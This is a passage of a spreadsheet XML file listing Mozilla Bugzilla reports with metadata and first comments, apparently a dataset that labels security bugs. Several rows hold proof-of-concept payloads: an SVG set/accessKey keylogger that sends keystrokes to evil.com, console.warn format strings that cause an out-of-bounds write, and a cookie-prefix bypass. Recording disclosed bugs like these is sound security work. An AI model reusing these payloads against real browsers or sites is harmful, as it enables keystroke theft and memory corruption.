      </c>
      <c r="N1997" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1997" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1997" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q1997" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1997" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1997" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T1997" t="n">
        <v>1</v>
      </c>
      <c r="U1997" t="n">
        <v>0</v>
      </c>
      <c r="V1997" t="n">
        <v>6</v>
      </c>
      <c r="W1997" t="inlineStr">
        <is>
          <t>Now that PlacesUtils can be lazy, it's loaded a bit later</t>
        </is>
      </c>
      <c r="X1997" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1998">
      <c r="A1998" t="n">
        <v>1550725</v>
      </c>
      <c r="B1998" t="inlineStr">
        <is>
          <t>2019-05-10 05:41:01 -0700</t>
        </is>
      </c>
      <c r="C1998" t="inlineStr">
        <is>
          <t>Crash in [@ GeckoCrash] (called `Option::unwrap()` on a `None` value)</t>
        </is>
      </c>
      <c r="D1998" t="inlineStr">
        <is>
          <t>2019-06-11 19:16:12 -0700</t>
        </is>
      </c>
      <c r="E1998" t="n">
        <v>1</v>
      </c>
      <c r="F1998" t="n">
        <v>1</v>
      </c>
      <c r="G1998" t="n">
        <v>3</v>
      </c>
      <c r="H1998" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1998" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1998" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K1998" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L1998" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1998" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1998" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1998" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1998" t="inlineStr"/>
      <c r="Q1998" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1998" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1998" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T1998" t="n">
        <v>1</v>
      </c>
      <c r="U1998" t="n">
        <v>0</v>
      </c>
      <c r="V1998" t="n">
        <v>9</v>
      </c>
      <c r="W1998" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-286d3230-36af-44d9-9fa5-d56060190510.
```
Top 10 frames of crashing thread:
0 libxul.so GeckoCrash toolkit/xre/nsAppRunner.cpp:5070
1 libxul.so gkrust_shared::panic_hook toolkit/library/rust/shared/lib.rs:243
2 libxul.so core::ops::function::Fn::call src/libcore/ops/function.rs:69
3 libxul.so rust_panic_with_hook src/libstd/panicking.rs:482
4 libxul.so continue_panic_fmt src/libstd/panicking.rs:385
5 libxul.so rust_begin_unwind 
6 libxul.so panic_fmt src/libcore/panicking.rs:85
7 libxul.so panic src/libcore/panicking.rs:49
8 libxul.so &lt;webrender::prim_store::SpaceMapper&lt;F, T&gt;&gt;::map gfx/wr/webrender/src/util.rs
9 libxul.so webrender::prim_store::PrimitiveStore::update_visibility gfx/wr/webrender/src/prim_store/mod.rs:2070
```
From bug 1549993, comment 3:
&gt; I can reproduce it on linux too with url https://www.impots.gouv.fr/portail/.
&gt; In using mozregression and my profile, I got:
&gt; mozregression --profile /home/calixte/.mozilla/firefox/myprofile --pref "gfx.webrender.all:true" --good 2019-05-05
&gt;
&gt; https://hg.mozilla.org/integration/mozilla-inbound/pushloghtml?fromchange=5772a92c49cf6cc746fe0d22a797fe3f08a20f39&amp;tochange=34510ca46cc61984ca775f30a7c4f288371cf329
&gt;
&gt; :aosmond, could you investigate please? (if you need I can share my profile with you, just ping me on slack, irc, mail...)</t>
        </is>
      </c>
      <c r="X1998" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1999">
      <c r="A1999" t="n">
        <v>704482</v>
      </c>
      <c r="B1999" t="inlineStr">
        <is>
          <t>2011-11-22 07:29:03 -0800</t>
        </is>
      </c>
      <c r="C1999" t="inlineStr">
        <is>
          <t>SVG / SMIL &lt;set&gt; and &lt;animate&gt; elements allow key-logging w/o JavaScript</t>
        </is>
      </c>
      <c r="D1999" t="inlineStr">
        <is>
          <t>2013-03-11 11:30:19 -0700</t>
        </is>
      </c>
      <c r="E1999" t="n">
        <v>1</v>
      </c>
      <c r="F1999" t="n">
        <v>1</v>
      </c>
      <c r="G1999" t="n">
        <v>3</v>
      </c>
      <c r="H1999" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1999" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1999" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1999" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1999" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1999" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1999" t="inlineStr">
        <is>
          <t>[sg:moderate][secr:dveditz][QA: see comment 90][qa+][qa!:11]</t>
        </is>
      </c>
      <c r="Q1999" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R1999" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1999" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T1999" t="n">
        <v>1</v>
      </c>
      <c r="U1999" t="n">
        <v>0</v>
      </c>
      <c r="V1999" t="n">
        <v>93</v>
      </c>
      <c r="W1999" t="inlineStr">
        <is>
          <t>Created attachment 576158
testcase.html
User Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Build ID: 20110928224103
Steps to reproduce:
SVG provides several elements allowing modification of existing element attributes. Those are &lt;set&gt;, &lt;animate&gt; and others: http://www.w3.org/TR/SVG/animate.html
These elements can contain an attribute called begin. This can -- among other values -- be applied with an access key listener by using the function accessKey(): http://www.w3.org/TR/SVG/animate.html#TimingAttributes
Example 1:
&lt;!-- Press a to fill the circle with color 'red' --&gt;
&lt;svg height="50px"&gt;
&lt;circle r="100"&gt;
&lt;set attributeName="fill" begin="accessKey(a)" to="red" /&gt;
&lt;/circle&gt;
&lt;/svg&gt;
An attacker can use this to inject non-scripting markup into a website and afterwards record user's keystrokes. The attached test-case demonstrates that. 
Example 2:
&lt;!doctype html&gt;
&lt;form&gt;
&lt;label&gt;type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)&lt;/label&gt;
&lt;br&gt;
&lt;input name="secret" type="password"&gt;
&lt;/form&gt;
&lt;!-- injection --&gt;
&lt;svg height="50px"&gt;
&lt;image xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
&lt;set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" /&gt;
&lt;set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" /&gt;
&lt;set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c" /&gt;
&lt;set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d" /&gt;
&lt;/image&gt;
&lt;/svg&gt;
An MPEG video was made available as well to show the effect: http://www.twitvid.com/ICOMS
Actual results:
The attached test-case allows an attacker to send keystroke information to an arbitrary domain. Note: here we use //evil.com - you might want to change the PoC before testing to avoid referrer leakage. 
The issue was tested on various Firefox versions including 7.0.1, 8 and 11.0a1 (latest nightly) both Win7 and Ubuntu. All tested versions showed the described behavior.
The problem occurs as well in case the user has JavaScript deactivated / uses NoScript. NoScript author Giorgio Maone was informed about the bug. 
Expected results:
The access key listener should not listen on for keystrokes on document - or any given element on the loaded document. If necessary at all, the listener should work for the enclosing element, or the SVG -- but not leak to the rest of the document enclosing the SVG.
Firefox / Gecko-browsers are the only user agents showing this behavior (so far). Chrome and Opera do not leak the stroke listener to the whole document, IE doesn't support &lt;set&gt; and &lt;animate&gt;.</t>
        </is>
      </c>
      <c r="X1999" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2000">
      <c r="A2000" t="n">
        <v>816842</v>
      </c>
      <c r="B2000" t="inlineStr">
        <is>
          <t>2012-11-29 20:19:11 -0800</t>
        </is>
      </c>
      <c r="C2000" t="inlineStr">
        <is>
          <t>Quickstubs returning jsval should JS_WrapValue</t>
        </is>
      </c>
      <c r="D2000" t="inlineStr">
        <is>
          <t>2013-04-30 18:40:50 -0700</t>
        </is>
      </c>
      <c r="E2000" t="n">
        <v>1</v>
      </c>
      <c r="F2000" t="n">
        <v>1</v>
      </c>
      <c r="G2000" t="n">
        <v>3</v>
      </c>
      <c r="H2000" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2000" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2000" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2000" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2000" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2000" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2000" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2000" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2000" t="inlineStr">
        <is>
          <t>[adv-main18+][adv-esr17+][adv-esr10+]</t>
        </is>
      </c>
      <c r="Q2000" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2000" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2000" t="inlineStr">
        <is>
          <t>mozilla20</t>
        </is>
      </c>
      <c r="T2000" t="n">
        <v>1</v>
      </c>
      <c r="U2000" t="n">
        <v>0</v>
      </c>
      <c r="V2000" t="n">
        <v>24</v>
      </c>
      <c r="W2000" t="inlineStr">
        <is>
          <t>I ran into this in bug 812744 but didn't realize until later that this was also a problem.
Patch coming up.  Example codegen before the patch:
    nsresult rv;
    rv = self-&gt;GetOnmouseenter(cx, vp);
    if (NS_FAILED(rv))
        return xpc_qsThrowGetterSetterFailed(cx, rv, JSVAL_TO_OBJECT(*vp), id);
    return JS_TRUE;
and after:
    nsresult rv;
    jsval result;
    rv = self-&gt;GetOnmouseenter(cx, &amp;result);
    if (NS_FAILED(rv))
        return xpc_qsThrowGetterSetterFailed(cx, rv, JSVAL_TO_OBJECT(*vp), id);
    *vp = result;
    return JS_WrapValue(cx, vp);
Note that before the patch we had two problems:
1)  If the native method threw, we passed an already-clobbered thing to the third argument of xpc_qsThrowGetterSetterFailed.  In fact, what we passed might not be an object at all, and might not be in the compartment of cx even if it is, and so forth.
2)  We never ensured that the return value is in the compartment of cx.
The patch fixes both issues.</t>
        </is>
      </c>
      <c r="X2000" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2001">
      <c r="A2001" t="n">
        <v>944321</v>
      </c>
      <c r="B2001" t="inlineStr">
        <is>
          <t>2013-11-28 01:55:44 -0800</t>
        </is>
      </c>
      <c r="C2001" t="inlineStr">
        <is>
          <t>--ion-check-range-analysis failure with Float32Array (SIGTRAP)</t>
        </is>
      </c>
      <c r="D2001" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:01 -0800</t>
        </is>
      </c>
      <c r="E2001" t="n">
        <v>1</v>
      </c>
      <c r="F2001" t="n">
        <v>1</v>
      </c>
      <c r="G2001" t="n">
        <v>3</v>
      </c>
      <c r="H2001" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2001" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2001" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2001" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2001" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2001" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2001" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2001" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2001" t="inlineStr">
        <is>
          <t>[adv-main27+]</t>
        </is>
      </c>
      <c r="Q2001" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2001" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2001" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T2001" t="n">
        <v>1</v>
      </c>
      <c r="U2001" t="n">
        <v>0</v>
      </c>
      <c r="V2001" t="n">
        <v>18</v>
      </c>
      <c r="W2001" t="inlineStr">
        <is>
          <t>Created attachment 8339864
stack
toString = (function() {
    function f() {
        Float32Array()[6] = 33554433
    }
    return f
})()
this + Object({
    e: this % 1
})
causes a SIGTRAP in js opt shell on m-c changeset 77b5c6edfe96 with --ion-check-range-analysis --ion-eager --ion-gvn=off
My configure flags are:
CC="clang -Qunused-arguments" AR=ar CXX="clang++ -Qunused-arguments" sh ./configure --target=x86_64-apple-darwin12.5.0 --enable-optimize --disable-debug --enable-profiling --enable-gczeal --enable-debug-symbols --enable-methodjit --enable-type-inference --disable-tests --enable-more-deterministic --with-ccache --enable-threadsafe &lt;other NSPR options&gt;
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   http://hg.mozilla.org/mozilla-central/rev/c78a87a9aa66
user:        Nathan Froyd
date:        Tue Aug 27 16:32:44 2013 -0400
summary:     Bug 909922 - don't pragma pack ipc message headers; r=bent
but I think autoBisect is wrong here.
Adding :sunfish as well, as this seems to involve --ion-check-range-analysis. s-s because SIGTRAPs can be bad.</t>
        </is>
      </c>
      <c r="X2001" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2002">
      <c r="A2002" t="n">
        <v>912941</v>
      </c>
      <c r="B2002" t="inlineStr">
        <is>
          <t>2013-09-05 04:14:27 -0700</t>
        </is>
      </c>
      <c r="C2002" t="inlineStr">
        <is>
          <t>Fix scrollIntoView calls for earlier Firefox versions where it hasn't been implemented yet</t>
        </is>
      </c>
      <c r="D2002" t="inlineStr">
        <is>
          <t>2016-08-24 09:02:38 -0700</t>
        </is>
      </c>
      <c r="E2002" t="n">
        <v>1</v>
      </c>
      <c r="F2002" t="n">
        <v>1</v>
      </c>
      <c r="G2002" t="n">
        <v>6</v>
      </c>
      <c r="H2002" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2002" t="inlineStr">
        <is>
          <t>Testing Graveyard</t>
        </is>
      </c>
      <c r="J2002" t="inlineStr">
        <is>
          <t>Mozmill</t>
        </is>
      </c>
      <c r="K2002" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2002" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2002" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2002" t="inlineStr">
        <is>
          <t>[mozmill-2.0+][mozmill-1.5.23+][ateamtrack: p=mozmill q=2013q3 m=3]</t>
        </is>
      </c>
      <c r="Q2002" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2002" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2002" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2002" t="n">
        <v>1</v>
      </c>
      <c r="U2002" t="n">
        <v>0</v>
      </c>
      <c r="V2002" t="n">
        <v>25</v>
      </c>
      <c r="W2002" t="inlineStr">
        <is>
          <t>I've only found 1 instance that is not properly handled:
https://github.com/mozilla/mozmill/blob/master/mozmill/mozmill/extension/resource/driver/mozelement.js#L1033
This should be handled in the same way as the others are:
https://github.com/mozilla/mozmill/blob/master/mozmill/mozmill/extension/resource/driver/mozelement.js#L366
This is the cause for bug 911101 
Affects both mozmill 2.0 and 1.5</t>
        </is>
      </c>
      <c r="X2002" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2003">
      <c r="A2003" t="n">
        <v>1018783</v>
      </c>
      <c r="B2003" t="inlineStr">
        <is>
          <t>2014-06-01 12:25:15 -0700</t>
        </is>
      </c>
      <c r="C2003" t="inlineStr">
        <is>
          <t>OOB write with sprintf and console functions</t>
        </is>
      </c>
      <c r="D2003" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:02 -0700</t>
        </is>
      </c>
      <c r="E2003" t="n">
        <v>1</v>
      </c>
      <c r="F2003" t="n">
        <v>1</v>
      </c>
      <c r="G2003" t="n">
        <v>3</v>
      </c>
      <c r="H2003" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2003" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="J2003" t="inlineStr">
        <is>
          <t>NSPR</t>
        </is>
      </c>
      <c r="K2003" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2003" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2003" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2003" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2003" t="inlineStr">
        <is>
          <t>[adv-main30+]</t>
        </is>
      </c>
      <c r="Q2003" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2003" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2003" t="inlineStr">
        <is>
          <t>4.10.6</t>
        </is>
      </c>
      <c r="T2003" t="n">
        <v>1</v>
      </c>
      <c r="U2003" t="n">
        <v>0</v>
      </c>
      <c r="V2003" t="n">
        <v>30</v>
      </c>
      <c r="W2003" t="inlineStr">
        <is>
          <t>Repro::
a.    &lt;script&gt;console.warn("%301f", "1");&lt;/script&gt;
b.    &lt;script&gt;console.warn("%65416.123f", "a");&lt;/script&gt;
Code:: (fout is char fout[300];)
    sprintf(fout, fin, d);
    /*
    ** This assert will catch overflow's of fout, when building with
    ** debugging on. At least this way we can track down the evil piece
    ** of calling code and fix it!
    */
    PR_ASSERT(strlen(fout) &lt; sizeof(fout));</t>
        </is>
      </c>
      <c r="X2003" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2004">
      <c r="A2004" t="n">
        <v>831986</v>
      </c>
      <c r="B2004" t="inlineStr">
        <is>
          <t>2013-01-17 12:54:28 -0800</t>
        </is>
      </c>
      <c r="C2004" t="inlineStr">
        <is>
          <t>Story - Double-tap Zoom</t>
        </is>
      </c>
      <c r="D2004" t="inlineStr">
        <is>
          <t>2019-01-02 07:21:12 -0800</t>
        </is>
      </c>
      <c r="E2004" t="n">
        <v>1</v>
      </c>
      <c r="F2004" t="n">
        <v>1</v>
      </c>
      <c r="G2004" t="n">
        <v>6</v>
      </c>
      <c r="H2004" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2004" t="inlineStr">
        <is>
          <t>Tracking Graveyard</t>
        </is>
      </c>
      <c r="J2004" t="inlineStr">
        <is>
          <t>Metro Operations</t>
        </is>
      </c>
      <c r="K2004" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2004" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2004" t="inlineStr">
        <is>
          <t>Windows 8.1</t>
        </is>
      </c>
      <c r="N2004" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2004" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2004" t="inlineStr">
        <is>
          <t>[block28] feature=story c=Content_features u=metro_firefox_user p=5</t>
        </is>
      </c>
      <c r="Q2004" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2004" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2004" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2004" t="n">
        <v>1</v>
      </c>
      <c r="U2004" t="n">
        <v>0</v>
      </c>
      <c r="V2004" t="n">
        <v>12</v>
      </c>
      <c r="W2004" t="inlineStr">
        <is>
          <t>Created attachment 703554
UC-128 	 Double-tap Zoom</t>
        </is>
      </c>
      <c r="X2004" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2005">
      <c r="A2005" t="n">
        <v>1779993</v>
      </c>
      <c r="B2005" t="inlineStr">
        <is>
          <t>2022-07-18 02:56:49 -0700</t>
        </is>
      </c>
      <c r="C2005" t="inlineStr">
        <is>
          <t>'=' prepended to set-cookie header can result in __Secure- and __Host- prefix bypasses</t>
        </is>
      </c>
      <c r="D2005" t="inlineStr">
        <is>
          <t>2024-05-30 10:57:58 -0700</t>
        </is>
      </c>
      <c r="E2005" t="n">
        <v>1</v>
      </c>
      <c r="F2005" t="n">
        <v>1</v>
      </c>
      <c r="G2005" t="n">
        <v>3</v>
      </c>
      <c r="H2005" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2005" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2005" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K2005" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2005" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2005" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2005" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2005" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][necko-triaged][post-critsmash-triage] [necko-priority-queue][adv-main105+][adv-esr102.3+]</t>
        </is>
      </c>
      <c r="Q2005" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2005" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2005" t="inlineStr">
        <is>
          <t>106 Branch</t>
        </is>
      </c>
      <c r="T2005" t="n">
        <v>1</v>
      </c>
      <c r="U2005" t="n">
        <v>0</v>
      </c>
      <c r="V2005" t="n">
        <v>36</v>
      </c>
      <c r="W2005" t="inlineStr">
        <is>
          <t>1. Go to http://httpbin.org
2. Execute document.cookie = "= __Host-test=a" in the console
3. Go to http://httpbin.org/headers and see Cookie with cookie: 'Cookie	"__Host-test=a"'. This shouldn't happen as __Secure- and __Host- should only be set from a secure context</t>
        </is>
      </c>
      <c r="X2005" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2006">
      <c r="A2006" t="n">
        <v>1197901</v>
      </c>
      <c r="B2006" t="inlineStr">
        <is>
          <t>2015-08-24 10:38:44 -0700</t>
        </is>
      </c>
      <c r="C2006" t="inlineStr">
        <is>
          <t>Risks in the current implementation of Firefox on Android in accessing to the mobile orientation and motion sensors via JavaScript codes</t>
        </is>
      </c>
      <c r="D2006" t="inlineStr">
        <is>
          <t>2020-12-14 17:49:55 -0800</t>
        </is>
      </c>
      <c r="E2006" t="n">
        <v>1</v>
      </c>
      <c r="F2006" t="n">
        <v>1</v>
      </c>
      <c r="G2006" t="n">
        <v>3</v>
      </c>
      <c r="H2006" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2006" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2006" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K2006" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2006" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2006" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2006" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2006" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2006" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main46+]</t>
        </is>
      </c>
      <c r="Q2006" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2006" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2006" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T2006" t="n">
        <v>1</v>
      </c>
      <c r="U2006" t="n">
        <v>0</v>
      </c>
      <c r="V2006" t="n">
        <v>50</v>
      </c>
      <c r="W2006" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Build ID: 20150630154324
Steps to reproduce:
Dear Sir/ Madam,
I am writing to you on behalf of a team of researchers in mobile security from Newcastle University, UK. Based on our recent work, we have identified vulnerabilities in the current implementation of Firefox for Android in regards to accessing to the mobile orientation and motion sensors via JavaScript codes. The results of our work show that it is possible to infer user’s touch actions such as click, scroll, and zoom, as well as his PINs based on the sensor streams accessible through different mobile browsers including yours. This feature seems to be implemented in Firefox according to the W3C device orientation event specification (http://www.w3.org/TR/orientation-event/) which needs to be revised too. 
A preliminary version of our work is already published here (http://dl.acm.org/citation.cfm?id=2714650). The detailed version of the paper including attacks on user’s PINs will be published soon. We would be very happy to provide you with more information in regards to this problem.
Regards,
Maryam Mehrnezhad
Actual results:
User privacy and security leak</t>
        </is>
      </c>
      <c r="X2006" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2007">
      <c r="A2007" t="n">
        <v>1042695</v>
      </c>
      <c r="B2007" t="inlineStr">
        <is>
          <t>2014-07-23 07:20:36 -0700</t>
        </is>
      </c>
      <c r="C2007" t="inlineStr">
        <is>
          <t>Comment left by treeherder-to-TBPL-sync omits the bug number</t>
        </is>
      </c>
      <c r="D2007" t="inlineStr">
        <is>
          <t>2014-09-17 06:51:33 -0700</t>
        </is>
      </c>
      <c r="E2007" t="n">
        <v>1</v>
      </c>
      <c r="F2007" t="n">
        <v>1</v>
      </c>
      <c r="G2007" t="n">
        <v>7</v>
      </c>
      <c r="H2007" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2007" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2007" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K2007" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2007" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2007" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2007" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2007" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2007" t="inlineStr"/>
      <c r="Q2007" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2007" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2007" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2007" t="n">
        <v>1</v>
      </c>
      <c r="U2007" t="n">
        <v>0</v>
      </c>
      <c r="V2007" t="n">
        <v>11</v>
      </c>
      <c r="W2007" t="inlineStr">
        <is>
          <t>Classifying a failure on treeherder successfully leaves a comment on TBPL for the same job (nice work!).
The comment left on TBPL is:
intermittent
Please could we make it something like:
Bug 123456 (classification: intermittent)
And for multiple bugs:
Bug 123456, Bug 654321 (classification: intermittent)</t>
        </is>
      </c>
      <c r="X2007" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2008">
      <c r="A2008" t="n">
        <v>888314</v>
      </c>
      <c r="B2008" t="inlineStr">
        <is>
          <t>2013-06-28 08:41:26 -0700</t>
        </is>
      </c>
      <c r="C2008" t="inlineStr">
        <is>
          <t>Buffer overflow in Updater</t>
        </is>
      </c>
      <c r="D2008" t="inlineStr">
        <is>
          <t>2024-05-30 08:04:52 -0700</t>
        </is>
      </c>
      <c r="E2008" t="n">
        <v>1</v>
      </c>
      <c r="F2008" t="n">
        <v>1</v>
      </c>
      <c r="G2008" t="n">
        <v>3</v>
      </c>
      <c r="H2008" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2008" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2008" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K2008" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L2008" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
